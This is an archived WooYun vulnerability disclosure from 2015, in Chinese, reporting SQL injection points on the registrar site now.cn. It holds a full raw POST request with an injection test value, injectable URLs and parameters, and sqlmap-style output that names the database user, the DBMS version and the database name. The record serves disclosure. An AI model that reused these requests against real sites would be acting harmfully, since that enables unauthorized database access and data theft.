乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-22: 细节已通知厂商并且等待厂商处理中 2015-10-27: 厂商已经主动忽略漏洞,细节向公众公开
RT
注入点一:
POST /GProduct/GOrder_submit.net HTTP/1.1Content-Length: 342Content-Type: application/x-www-form-urlencodedReferer: http://www.now.cn:80/Cookie: PHPSESSID=og8dknooforjuqnrnleclvo9vjaik2kg; IDReaded_C=%2C14664; reference=%21M2OT_236; NOWA=%2B236_241;Host: www.now.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*Submit2=%e7%a1%ae%20%e5%ae%9a&ACC=CN&ACity=San%20Francisco&AEmail=sample%40email.tst&AFax=317-317-3137&AMobile=987-65-4329&AName=jlsawjdd&AName_GB=jlsawjdd&AOrganization=1&AOrganization_GB=1&APC=1&ASP=1&AStreet=3137%20Laguna%20Street&AStreet1=3137%20Laguna%20Street&ATel=1&chrMemo%5b%5d=1'%22&chrProd=&IDProd=&showMess%5b%5d=&SSP=1&tld%5b%5d=参数chrMemo%5b%5d 和 tld%5b%5d存在注入
第二处注入:
http://www.now.cn/news/media_list.php?page=%5c&seach=1post参数:Submit=%e6%90%9c%20%e7%b4%a2&page_variable_names=dmruvwgw&seach=1page参数存在sql注入
第三处sql注入:
http://www.now.cn/web/template.php?Category=8&id=%5c&page=4&panel=112id参数存在sql注入
web application technology: Apache, PHP 5.5.18back-end DBMS: MySQL 5.1current user: '[email protected].%'current user is DBA: Falseavailable databases [1]:[*] db_now_net_cn
http://www.now.cn/domain-admin/bulkDNSChangeEpp_submit.netpost参数:Submit=%e7%a1%ae%e5%ae%9a&agreement=*&backURL=domain_list.net%3ffIDDomainFolder%3dnull&button=%e6%b7%bb%e5%8a%a0%e6%9b%b4%e5%a4%9a%e5%9f%9f%e5%90%8d%e6%9c%8d%e5%8a%a1%e5%99%a8&Cancel=%e5%8f%96%e6%b6%88&domains=&NSList%5b%5d=1&SPassword=g00dPa%24%24w0rD&Su=%e8%bf%94%20%e5%9b%9e&Submit=%e4%bf%ae%20%e6%94%b9参数agreement参数backURL参数button参数Cancel参数domains参数NSList%5v%5d参数SPassword参数Su参数Submit参数都存在注入
参数过滤
危害等级:无影响厂商忽略
忽略时间:2015-10-27 09:34
漏洞Rank:15 (WooYun评价)
暂无